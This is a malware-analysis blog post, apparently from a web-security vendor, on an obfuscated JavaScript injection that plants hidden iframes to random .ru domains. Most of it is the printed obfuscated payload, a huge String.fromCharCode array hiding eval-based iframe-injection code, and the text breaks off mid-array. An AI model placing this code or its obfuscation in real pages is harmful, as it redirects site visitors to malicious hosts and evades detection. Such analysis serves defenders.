Quttera web security blog: Multiple obfuscation to hide JavaScript malware

Malicious JavaScript code protected by multiple obfuscations

Background

Online Website Malware Scanner detected malicious JavaScript code injection in the scanned website. Such malicious obfuscated JavaScript code is used to inject hidden iframes to random domains in *.ru area. Similar infections has been analyzed in other posts about malicious iframes generation. This particular threat is described in here by Vericon Labs.

This post describes the obfuscation levels and malicious payload.

First obfuscation level

alert(String.fromCharCode(116,114,121,123,112,114,111,116,111,116,121,112,101,37,50,59,125,99,97,116,99,104,40,97,115,100,41,123,120,61,50,59,125,116,114,121,123,113,61,100,111,99,117,109,101,110,116,91,40,120,41,63,34,99,34,43,34,114,34,58,50,43,34,101,34,43,34,97,34,43,34,116,34,43,34,101,34,43,34,69,34,43,34,108,34,43,34,101,34,43,34,109,34,43,40,40,102,41,63,34,101,34,43,34,110,34,43,34,116,34,58,34,34,41,93,40,34,112,34,41,59,113,46,97,112,112,101,110,100,67,104,105,108,100,40,113,43,34,34,41,59,125,99,97,116,99,104,40,102,119,98,101,119,101,41,123,105,61,48,59,116,114,121,123,112,114,111,116,111,116,121,112,101,42,53,59,125,99,97,116,99,104,40,122,41,123,102,114,61,34,102,114,111,109,67,104,97,114,34,59,102,61,91,53,49,48,44,55,48,50,44,53,53,48,44,53,57,52,44,53,56,48,44,54,51,48,44,53,53,53,44,54,54,48,44,49,54,48,44,54,54,48,44,53,48,53,44,55,50,48,44,53,56,48,44,52,57,50,44,52,56,53,44,54,54,48,44,53,48,48,44,54,54,54,44,53,52,53,44,52,54,56,44,53,56,53,44,54,53,52,44,52,57,48,44,54,48,54,44,53,55,48,44,50,52,48,44,50,48,53,44,55,51,56,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,55,48,56,44,52,56,53,44,54,56,52,44,49,54,48,44,54,50,52,44,53,50,53,44,49,57,50,44,51,48,53,44,49,57,50,44,53,56,48,44,54,50,52,44,53,50,53,44,54,57,48,44,50,51,48,44,54,57,48,44,53,48,53,44,54,48,54,44,53,48,48,44,49,57,50,44,50,51,53,44,49,57,50,44,53,56,48,44,54,50,52,44,53,50,53,44,54,57,48,44,50,51,48,44,52,56,54,44,50,57,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,57,48,44,53,56,50,44,53,55,48,44,49,57,50,44,53,52,48,44,54,54,54,44,49,54,48,44,51,54,54,44,49,54,48,44,54,57,54,44,53,50,48,44,54,51,48,44,53,55,53,44,50,55,54,44,53,55,53,44,54,48,54,44,53,48,53,44,54,48,48,44,49,54,48,44,50,50,50,44,49,54,48,44,54,57,54,44,53,50,48,44,54,51,48,44,53,55,53,44,50,55,54,44,52,48,53,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,55,48,56,44,52,56,53,44,54,56,52,44,49,54,48,44,54,57,54,44,53,48,53,44,54,57,48,44,53,56,48,44,49,57,50,44,51,48,53,44,49,57,50,44,53,56,48,44,54,50,52,44,53,50,53,44,54,57,48,44,50,51,48,44,51,57,48,44,49,54,48,44,50,53,50,44,49,54,48,44,54,52,56,44,53,53,53,44,49,57,50,44,50,50,53,44,49,57,50,44,53,56,48,44,54,50,52,44,53,50,53,44,54,57,48,44,50,51,48,44,52,57,50,44,49,54,48,44,50,53,50,44,49,54,48,44,54,50,52,44,53,50,53,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,51,48,44,53,49,48,44,50,52,48,44,53,56,48,44,54,48,54,44,53,55,53,44,54,57,54,44,49,54,48,44,51,55,50,44,49,54,48,44,50,56,56,44,50,48,53,44,55,51,56,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,57,54,44,53,50,48,44,54,51,48,44,53,55,53,44,50,55,54,44,53,55,53,44,54,48,54,44,53,48,53,44,54,48,48,44,49,54,48,44,51,54,54,44,49,54,48,44,54,57,54,44,53,48,53,44,54,57,48,44,53,56,48,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,55,53,48,44,49,54,48,44,54,48,54,44,53,52,48,44,54,57,48,44,53,48,53,44,49,57,50,44,54,49,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,56,48,44,54,50,52,44,53,50,53,44,54,57,48,44,50,51,48,44,54,57,48,44,53,48,53,44,54,48,54,44,53,48,48,44,49,57,50,44,51,48,53,44,49,57,50,44,53,56,48,44,54,48,54,44,53,55,53,44,54,57,54,44,49,54,48,44,50,53,56,44,49,54,48,44,54,57,54,44,53,50,48,44,54,51,48,44,53,55,53,44,50,55,54,44,51,56,53,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,55,53,48,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,56,52,44,53,48,53,44,54,57,54,44,53,56,53,44,54,56,52,44,53,53,48,44,49,57,50,44,50,48,48,44,54,57,54,44,53,50,48,44,54,51,48,44,53,55,53,44,50,55,54,44,53,55,53,44,54,48,54,44,53,48,53,44,54,48,48,44,49,54,48,44,50,53,50,44,49,54,48,44,54,57,54,44,53,50,48,44,54,51,48,44,53,55,53,44,50,55,54,44,53,53,53,44,54,54,48,44,53,48,53,44,52,55,52,44,53,57,48,44,54,48,54,44,53,55,48,44,52,54,50,44,50,48,53,44,51,53,52,44,53,48,44,55,53,48,44,53,48,44,54,48,44,53,49,48,44,55,48,50,44,53,53,48,44,53,57,52,44,53,56,48,44,54,51,48,44,53,53,53,44,54,54,48,44,49,54,48,44,52,57,50,44,52,56,53,44,54,54,48,44,53,48,48,44,54,54,54,44,53,52,53,44,52,54,56,44,53,56,53,44,54,53,52,44,52,57,48,44,54,48,54,44,53,55,48,44,52,50,54,44,53,48,53,44,54,54,48,44,53,48,53,44,54,56,52,44,52,56,53,44,54,57,54,44,53,53,53,44,54,56,52,44,50,48,48,44,55,48,50,44,53,53,48,44,54,51,48,44,54,48,48,44,50,52,54,44,54,49,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,57,48,44,53,56,50,44,53,55,48,44,49,57,50,44,53,48,48,44,49,57,50,44,51,48,53,44,49,57,50,44,53,53,48,44,54,48,54,44,53,57,53,44,49,57,50,44,51,52,48,44,53,56,50,44,53,56,48,44,54,48,54,44,50,48,48,44,55,48,50,44,53,53,48,44,54,51,48,44,54,48,48,44,50,53,50,44,50,52,53,44,50,56,56,44,50,52,48,44,50,56,56,44,50,48,53,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,55,48,56,44,52,56,53,44,54,56,52,44,49,54,48,44,54,57,48,44,49,54,48,44,51,54,54,44,49,54,48,44,54,48,48,44,50,51,48,44,54,49,56,44,53,48,53,44,54,57,54,44,51,54,48,44,54,54,54,44,53,56,53,44,54,56,52,44,53,55,53,44,50,52,48,44,50,48,53,44,49,57,50,44,51,49,48,44,49,57,50,44,50,52,53,44,51,48,48,44,49,54,48,44,51,55,56,44,49,54,48,44,50,57,52,44,49,54,48,44,51,52,56,44,49,54,48,44,50,56,56,44,50,57,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,56,48,44,54,50,52,44,53,50,53,44,54,57,48,44,50,51,48,44,54,57,48,44,53,48,53,44,54,48,54,44,53,48,48,44,49,57,50,44,51,48,53,44,49,57,50,44,50,53,48,44,51,48,54,44,50,54,48,44,51,49,56,44,50,55,48,44,51,51,48,44,50,56,48,44,51,52,50,44,50,52,48,44,50,57,52,44,49,54,48,44,50,53,56,44,49,54,48,44,50,52,48,44,53,48,48,44,50,55,54,44,53,49,53,44,54,48,54,44,53,56,48,44,52,54,50,44,53,53,53,44,54,54,48,44,53,56,48,44,54,50,52,44,50,48,48,44,50,52,54,44,49,54,48,44,50,53,50,44,49,54,48,44,50,56,56,44,54,48,48,44,52,50,48,44,51,53,48,44,52,50,48,44,51,53,48,44,52,50,48,44,51,53,48,44,50,52,54,44,49,54,48,44,50,53,56,44,49,54,48,44,50,52,48,44,53,48,48,44,50,55,54,44,53,49,53,44,54,48,54,44,53,56,48,44,52,48,56,44,52,56,53,44,54,57,54,44,53,48,53,44,50,52,48,44,50,48,53,44,49,57,50,44,50,49,48,44,49,57,50,44,50,52,48,44,55,50,48,44,51,53,48,44,52,50,48,44,51,53,48,44,52,50,48,44,50,48,53,44,50,53,56,44,49,54,48,44,50,52,48,44,51,56,53,44,53,56,50,44,53,56,48,44,54,50,52,44,50,51,48,44,54,56,52,44,53,53,53,44,55,48,50,44,53,53,48,44,54,48,48,44,50,48,48,44,54,57,48,44,49,54,48,44,50,53,50,44,49,54,48,44,50,56,56,44,54,48,48,44,52,50,48,44,51,53,48,44,52,50,48,44,50,48,53,44,50,52,54,44,50,57,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,56,48,44,54,50,52,44,53,50,53,44,54,57,48,44,50,51,48,44,51,57,48,44,49,54,48,44,51,54,54,44,49,54,48,44,51,49,50,44,50,56,48,44,51,48,48,44,50,55,53,44,50,57,52,44,50,57,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,56,48,44,54,50,52,44,53,50,53,44,54,57,48,44,50,51,48,44,52,54,50,44,49,54,48,44,51,54,54,44,49,54,48,44,51,48,48,44,50,52,53,44,51,49,50,44,50,55,53,44,51,49,50,44,50,56,48,44,51,48,54,44,50,55,48,44,51,49,50,44,50,55,53,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,57,54,44,53,50,48,44,54,51,48,44,53,55,53,44,50,55,54,44,52,48,53,44,49,57,50,44,51,48,53,44,49,57,50,44,53,56,48,44,54,50,52,44,53,50,53,44,54,57,48,44,50,51,48,44,52,54,50,44,49,54,48,44,50,56,50,44,49,54,48,44,54,57,54,44,53,50,48,44,54,51,48,44,53,55,53,44,50,55,54,44,51,50,53,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,57,54,44,53,50,48,44,54,51,48,44,53,55,53,44,50,55,54,44,52,49,48,44,49,57,50,44,51,48,53,44,49,57,50,44,53,56,48,44,54,50,52,44,53,50,53,44,54,57,48,44,50,51,48,44,52,54,50,44,49,54,48,44,50,50,50,44,49,54,48,44,54,57,54,44,53,50,48,44,54,51,48,44,53,55,53,44,50,55,54,44,51,50,53,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,57,54,44,53,50,48,44,54,51,48,44,53,55,53,44,50,55,54,44,53,53,53,44,54,54,48,44,53,48,53,44,52,55,52,44,53,57,48,44,54,48,54,44,53,55,48,44,52,54,50,44,49,54,48,44,51,54,54,44,49,54,48,44,50,57,52,44,50,51,48,44,50,56,56,44,49,54,48,44,50,56,50,44,49,54,48,44,54,57,54,44,53,50,48,44,54,51,48,44,53,55,53,44,50,55,54,44,51,56,53,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,57,54,44,53,50,48,44,54,51,48,44,53,55,53,44,50,55,54,44,53,53,48,44,54,48,54,44,54,48,48,44,54,57,54,44,49,54,48,44,51,54,54,44,49,54,48,44,54,54,48,44,53,48,53,44,55,50,48,44,53,56,48,44,52,57,50,44,52,56,53,44,54,54,48,44,53,48,48,44,54,54,54,44,53,52,53,44,52,54,56,44,53,56,53,44,54,53,52,44,52,57,48,44,54,48,54,44,53,55,48,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,56,52,44,53,48,53,44,54,57,54,44,53,56,53,44,54,56,52,44,53,53,48,44,49,57,50,44,53,56,48,44,54,50,52,44,53,50,53,44,54,57,48,44,50,57,53,44,54,48,44,54,50,53,44,54,48,44,53,48,44,54,49,50,44,53,56,53,44,54,54,48,44,52,57,53,44,54,57,54,44,53,50,53,44,54,54,54,44,53,53,48,44,49,57,50,44,52,57,53,44,54,56,52,44,53,48,53,44,53,56,50,44,53,56,48,44,54,48,54,44,52,49,48,44,53,56,50,44,53,53,48,44,54,48,48,44,53,53,53,44,54,53,52,44,51,57,48,44,55,48,50,44,53,52,53,44,53,56,56,44,53,48,53,44,54,56,52,44,50,48,48,44,54,56,52,44,50,50,48,44,49,57,50,44,51,56,53,44,54,51,48,44,53,53,48,44,50,54,52,44,49,54,48,44,52,54,50,44,52,56,53,44,55,50,48,44,50,48,53,44,55,51,56,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,56,52,44,53,48,53,44,54,57,54,44,53,56,53,44,54,56,52,44,53,53,48,44,49,57,50,44,51,56,53,44,53,56,50,44,53,56,48,44,54,50,52,44,50,51,48,44,54,56,52,44,53,53,53,44,55,48,50,44,53,53,48,44,54,48,48,44,50,48,48,44,50,52,48,44,51,56,53,44,53,56,50,44,54,48,48,44,50,55,48,44,51,56,53,44,54,51,48,44,53,53,48,44,50,52,54,44,49,54,48,44,50,53,50,44,49,54,48,44,54,56,52,44,50,51,48,44,54,54,48,44,53,48,53,44,55,50,48,44,53,56,48,44,50,52,48,44,50,48,53,44,49,57,50,44,50,49,53,44,49,57,50,44,51,56,53,44,54,51,48,44,53,53,48,44,50,52,54,44,50,57,53,44,54,48,44,54,50,53,44,54,48,44,53,48,44,54,49,50,44,53,56,53,44,54,54,48,44,52,57,53,44,54,57,54,44,53,50,53,44,54,54,54,44,53,53,48,44,49,57,50,44,53,49,53,44,54,48,54,44,53,53,48,44,54,48,54,44,53,55,48,44,53,56,50,44,53,56,48,44,54,48,54,44,52,48,48,44,54,57,48,44,53,48,53,44,55,48,50,44,53,48,48,44,54,54,54,44,52,49,48,44,53,56,50,44,53,53,48,44,54,48,48,44,53,53,53,44,54,53,52,44,52,49,53,44,54,57,54,44,53,55,48,44,54,51,48,44,53,53,48,44,54,49,56,44,50,48,48,44,55,48,50,44,53,53,48,44,54,51,48,44,54,48,48,44,50,54,52,44,49,54,48,44,54,52,56,44,53,48,53,44,54,54,48,44,53,49,53,44,54,57,54,44,53,50,48,44,50,54,52,44,49,54,48,44,55,51,50,44,53,53,53,44,54,54,48,44,53,48,53,44,50,52,54,44,54,49,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,57,48,44,53,56,50,44,53,55,48,44,49,57,50,44,53,55,48,44,53,56,50,44,53,53,48,44,54,48,48,44,49,54,48,44,51,54,54,44,49,54,48,44,54,54,48,44,53,48,53,44,55,49,52,44,49,54,48,44,52,57,50,44,52,56,53,44,54,54,48,44,53,48,48,44,54,54,54,44,53,52,53,44,52,54,56,44,53,56,53,44,54,53,52,44,52,57,48,44,54,48,54,44,53,55,48,44,52,50,54,44,53,48,53,44,54,54,48,44,53,48,53,44,54,56,52,44,52,56,53,44,54,57,54,44,53,53,53,44,54,56,52,44,50,48,48,44,55,48,50,44,53,53,48,44,54,51,48,44,54,48,48,44,50,52,54,44,50,57,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,57,48,44,53,56,50,44,53,55,48,44,49,57,50,44,53,52,48,44,54,48,54,44,53,56,48,44,54,57,54,44,53,48,53,44,54,56,52,44,53,55,53,44,49,57,50,44,51,48,53,44,49,57,50,44,52,53,53,44,50,51,52,44,52,56,53,44,50,51,52,44,50,50,48,44,50,51,52,44,52,57,48,44,50,51,52,44,50,50,48,44,50,51,52,44,52,57,53,44,50,51,52,44,50,50,48,44,50,51,52,44,53,48,48,44,50,51,52,44,50,50,48,44,50,51,52,44,53,48,53,44,50,51,52,44,50,50,48,44,50,51,52,44,53,49,48,44,50,51,52,44,50,50,48,44,50,51,52,44,53,49,53,44,50,51,52,44,50,50,48,44,50,51,52,44,53,50,48,44,50,51,52,44,50,50,48,44,50,51,52,44,53,50,53,44,50,51,52,44,50,50,48,44,50,51,52,44,53,51,48,44,50,51,52,44,50,50,48,44,50,51,52,44,53,51,53,44,50,51,52,44,50,50,48,44,50,51,52,44,53,52,48,44,50,51,52,44,50,50,48,44,50,51,52,44,53,52,53,44,50,51,52,44,50,50,48,44,50,51,52,44,53,53,48,44,50,51,52,44,50,50,48,44,50,51,52,44,53,53,53,44,50,51,52,44,50,50,48,44,50,51,52,44,53,54,48,44,50,51,52,44,50,50,48,44,50,51,52,44,53,54,53,44,50,51,52,44,50,50,48,44,50,51,52,44,53,55,48,44,50,51,52,44,50,50,48,44,50,51,52,44,53,55,53,44,50,51,52,44,50,50,48,44,50,51,52,44,53,56,48,44,50,51,52,44,50,50,48,44,50,51,52,44,53,56,53,44,50,51,52,44,50,50,48,44,50,51,52,44,53,57,48,44,50,51,52,44,50,50,48,44,50,51,52,44,53,57,53,44,50,51,52,44,50,50,48,44,50,51,52,44,54,48,48,44,50,51,52,44,50,50,48,44,50,51,52,44,54,48,53,44,50,51,52,44,50,50,48,44,50,51,52,44,54,49,48,44,50,51,52,44,52,54,53,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,55,48,56,44,52,56,53,44,54,56,52,44,49,54,48,44,54,57,48,44,53,56,48,44,54,56,52,44,49,54,48,44,51,54,54,44,49,54,48,44,50,51,52,44,49,57,53,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,49,50,44,53,53,53,44,54,56,52,44,50,48,48,44,55,48,56,44,52,56,53,44,54,56,52,44,49,54,48,44,54,51,48,44,49,54,48,44,51,54,54,44,49,54,48,44,50,56,56,44,50,57,53,44,49,57,50,44,53,50,53,44,49,57,50,44,51,48,48,44,49,57,50,44,53,52,48,44,54,48,54,44,53,53,48,44,54,49,56,44,53,56,48,44,54,50,52,44,50,57,53,44,49,57,50,44,53,50,53,44,49,57,50,44,50,49,53,44,50,53,56,44,49,54,48,44,50,52,54,44,54,49,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,55,53,44,54,57,54,44,53,55,48,44,49,57,50,44,50,49,53,44,51,54,54,44,49,54,48,44,54,52,56,44,53,48,53,44,54,57,54,44,53,56,48,44,54,48,54,44,53,55,48,44,54,57,48,44,52,53,53,44,53,57,52,44,53,55,48,44,54,48,54,44,52,56,53,44,54,57,54,44,53,48,53,44,52,57,50,44,52,56,53,44,54,54,48,44,53,48,48,44,54,54,54,44,53,52,53,44,52,54,56,44,53,56,53,44,54,53,52,44,52,57,48,44,54,48,54,44,53,55,48,44,50,52,48,44,53,55,48,44,53,56,50,44,53,53,48,44,54,48,48,44,50,50,48,44,49,57,50,44,50,52,48,44,50,54,52,44,49,54,48,44,54,52,56,44,53,48,53,44,54,57,54,44,53,56,48,44,54,48,54,44,53,55,48,44,54,57,48,44,50,51,48,44,54,52,56,44,53,48,53,44,54,54,48,44,53,49,53,44,54,57,54,44,53,50,48,44,49,57,50,44,50,50,53,44,49,57,50,44,50,52,53,44,50,52,54,44,52,54,53,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,55,53,48,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,56,52,44,53,48,53,44,54,57,54,44,53,56,53,44,54,56,52,44,53,53,48,44,49,57,50,44,53,55,53,44,54,57,54,44,53,55,48,44,49,57,50,44,50,49,53,44,49,57,50,44,49,57,53,44,50,55,54,44,49,57,53,44,49,57,50,44,50,49,53,44,49,57,50,44,54,49,48,44,54,54,54,44,53,53,48,44,54,48,54,44,50,57,53,44,54,48,44,54,50,53,44,54,48,44,53,48,44,54,57,48,44,53,48,53,44,54,57,54,44,52,50,48,44,54,51,48,44,53,52,53,44,54,48,54,44,53,53,53,44,55,48,50,44,53,56,48,44,50,52,48,44,53,49,48,44,55,48,50,44,53,53,48,44,53,57,52,44,53,56,48,44,54,51,48,44,53,53,53,44,54,54,48,44,50,48,48,44,50,52,54,44,54,49,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,56,48,44,54,56,52,44,54,48,53,44,55,51,56,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,51,48,44,53,49,48,44,50,52,48,44,53,56,48,44,55,50,54,44,53,54,48,44,54,48,54,44,53,53,53,44,54,49,50,44,49,54,48,44,54,51,48,44,53,49,48,44,54,56,52,44,52,56,53,44,54,53,52,44,53,48,53,44,53,50,50,44,52,56,53,44,54,57,48,44,51,51,53,44,54,56,52,44,53,48,53,44,53,56,50,44,53,56,48,44,54,48,54,44,53,48,48,44,49,57,50,44,51,48,53,44,51,54,54,44,49,54,48,44,50,48,52,44,53,56,53,44,54,54,48,44,53,48,48,44,54,48,54,44,53,49,48,44,54,51,48,44,53,53,48,44,54,48,54,44,53,48,48,44,50,48,52,44,50,48,53,44,55,51,56,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,51,48,44,53,49,48,44,54,56,52,44,52,56,53,44,54,53,52,44,53,48,53,44,53,50,50,44,52,56,53,44,54,57,48,44,51,51,53,44,54,56,52,44,53,48,53,44,53,56,50,44,53,56,48,44,54,48,54,44,53,48,48,44,49,57,50,44,51,48,53,44,49,57,50,44,53,56,48,44,54,56,52,44,53,56,53,44,54,48,54,44,50,57,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,57,48,44,53,56,50,44,53,55,48,44,49,57,50,44,53,56,53,44,54,54,48,44,53,50,53,44,55,50,48,44,49,54,48,44,51,54,54,44,49,54,48,44,52,54,50,44,52,56,53,44,54,57,54,44,53,50,48,44,50,55,54,44,53,55,48,44,54,54,54,44,53,56,53,44,54,54,48,44,53,48,48,44,50,52,48,44,50,49,53,44,54,54,48,44,53,48,53,44,55,49,52,44,49,54,48,44,52,48,56,44,52,56,53,44,54,57,54,44,53,48,53,44,50,52,48,44,50,48,53,44,50,56,50,44,50,52,53,44,50,56,56,44,50,52,48,44,50,56,56,44,50,48,53,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,55,48,56,44,52,56,53,44,54,56,52,44,49,54,48,44,54,48,48,44,53,53,53,44,54,53,52,44,52,56,53,44,54,51,48,44,53,53,48,44,52,54,56,44,52,56,53,44,54,53,52,44,53,48,53,44,49,57,50,44,51,48,53,44,49,57,50,44,53,49,53,44,54,48,54,44,53,53,48,44,54,48,54,44,53,55,48,44,53,56,50,44,53,56,48,44,54,48,54,44,52,48,48,44,54,57,48,44,53,48,53,44,55,48,50,44,53,48,48,44,54,54,54,44,52,49,48,44,53,56,50,44,53,53,48,44,54,48,48,44,53,53,53,44,54,53,52,44,52,49,53,44,54,57,54,44,53,55,48,44,54,51,48,44,53,53,48,44,54,49,56,44,50,48,48,44,55,48,50,44,53,53,48,44,54,51,48,44,54,48,48,44,50,54,52,44,49,54,48,44,50,57,52,44,50,55,48,44,50,54,52,44,49,54,48,44,50,51,52,44,53,55,48,44,55,48,50,44,49,57,53,44,50,52,54,44,50,57,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,50,53,44,54,49,50,44,53,55,48,44,54,53,52,44,49,54,48,44,51,54,54,44,49,54,48,44,54,48,48,44,53,53,53,44,53,57,52,44,53,56,53,44,54,53,52,44,53,48,53,44,54,54,48,44,53,56,48,44,50,55,54,44,52,57,53,44,54,56,52,44,53,48,53,44,53,56,50,44,53,56,48,44,54,48,54,44,51,52,53,44,54,52,56,44,53,48,53,44,54,53,52,44,53,48,53,44,54,54,48,44,53,56,48,44,50,52,48,44,49,55,48,44,52,51,56,44,51,53,48,44,52,57,50,44,51,50,53,44,52,54,50,44,51,52,53,44,50,48,52,44,50,48,53,44,51,53,52,44,49,54,48,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,50,53,44,54,49,50,44,53,55,48,44,54,53,52,44,50,51,48,44,54,57,48,44,53,48,53,44,54,57,54,44,51,50,53,44,54,57,54,44,53,56,48,44,54,56,52,44,53,50,53,44,53,56,56,44,53,56,53,44,54,57,54,44,53,48,53,44,50,52,48,44,49,55,48,44,54,57,48,44,53,55,48,44,53,57,52,44,49,55,48,44,50,54,52,44,49,54,48,44,50,48,52,44,53,50,48,44,54,57,54,44,53,56,48,44,54,55,50,44,50,57,48,44,50,56,50,44,50,51,53,44,50,48,52,44,50,49,53,44,54,48,48,44,53,53,53,44,54,53,52,44,52,56,53,44,54,51,48,44,53,53,48,44,52,54,56,44,52,56,53,44,54,53,52,44,53,48,53,44,50,53,56,44,49,55,48,44,50,56,50,44,53,55,48,44,55,48,50,44,53,53,48,44,54,49,50,44,53,53,53,44,54,56,52,44,53,48,53,44,54,57,48,44,53,56,48,44,54,56,52,44,53,56,53,44,54,54,48,44,51,49,53,44,54,57,48,44,53,50,53,44,54,48,48,44,51,48,53,44,53,56,56,44,53,53,53,44,54,57,54,44,53,53,48,44,54,48,54,44,53,56,48,44,51,48,48,44,49,55,48,44,50,52,54,44,50,57,53,44,49,57,50,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,51,48,44,53,49,48,44,54,56,52,44,53,52,53,44,50,55,54,44,53,55,53,44,54,57,54,44,54,48,53,44,54,52,56,44,53,48,53,44,50,55,54,44,53,57,53,44,54,51,48,44,53,48,48,44,54,57,54,44,53,50,48,44,49,57,50,44,51,48,53,44,49,57,50,44,49,55,48,44,50,56,56,44,53,54,48,44,55,50,48,44,49,55,48,44,51,53,52,44,49,54,48,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,50,53,44,54,49,50,44,53,55,48,44,54,53,52,44,50,51,48,44,54,57,48,44,53,56,48,44,55,50,54,44,53,52,48,44,54,48,54,44,50,51,48,44,54,50,52,44,53,48,53,44,54,51,48,44,53,49,53,44,54,50,52,44,53,56,48,44,49,57,50,44,51,48,53,44,49,57,50,44,49,55,48,44,50,56,56,44,53,54,48,44,55,50,48,44,49,55,48,44,51,53,52,44,49,54,48,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,50,53,44,54,49,50,44,53,55,48,44,54,53,52,44,50,51,48,44,54,57,48,44,53,56,48,44,55,50,54,44,53,52,48,44,54,48,54,44,50,51,48,44,55,48,56,44,53,50,53,44,54,57,48,44,53,50,53,44,53,56,56,44,53,50,53,44,54,52,56,44,53,50,53,44,54,57,54,44,54,48,53,44,49,57,50,44,51,48,53,44,49,57,50,44,49,55,48,44,54,50,52,44,53,50,53,44,54,48,48,44,53,48,48,44,54,48,54,44,53,53,48,44,50,48,52,44,50,57,53,44,49,57,50,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,48,48,44,53,53,53,44,53,57,52,44,53,56,53,44,54,53,52,44,53,48,53,44,54,54,48,44,53,56,48,44,50,55,54,44,52,57,48,44,54,54,54,44,53,48,48,44,55,50,54,44,50,51,48,44,53,56,50,44,53,54,48,44,54,55,50,44,53,48,53,44,54,54,48,44,53,48,48,44,52,48,50,44,53,50,48,44,54,51,48,44,53,52,48,44,54,48,48,44,50,48,48,44,54,51,48,44,53,49,48,44,54,56,52,44,53,52,53,44,50,52,54,44,50,57,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,54,50,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,54,50,53,44,53,57,52,44,52,56,53,44,54,57,54,44,52,57,53,44,54,50,52,44,50,48,48,44,54,48,54,44,50,48,53,44,55,51,56,44,54,50,53,44,54,48,44,54,50,53,44,50,54,52,44,49,54,48,44,51,49,56,44,50,52,48,44,50,56,56,44,50,48,53,44,51,53,52,93,59,118,61,34,101,118,97,34,59,125,105,102,40,118,41,101,61,119,105,110,100,111,119,91,118,43,34,108,34,93,59,119,61,102,59,115,61,91,93,59,114,61,83,116,114,105,110,103,59,122,61,40,40,101,41,63,34,67,111,100,101,34,58,34,34,41,59,102,111,114,40,59,49,55,55,54,45,53,43,53,62,105,59,105,43,61,49,41,123,106,61,105,59,105,102,40,101,41,115,61,115,43,114,91,102,114,43,40,40,101,41,63,34,67,111,100,101,34,58,49,50,41,93,40,40,119,91,106,93,47,40,53,43,101,40,34,106,37,50,34,41,41,4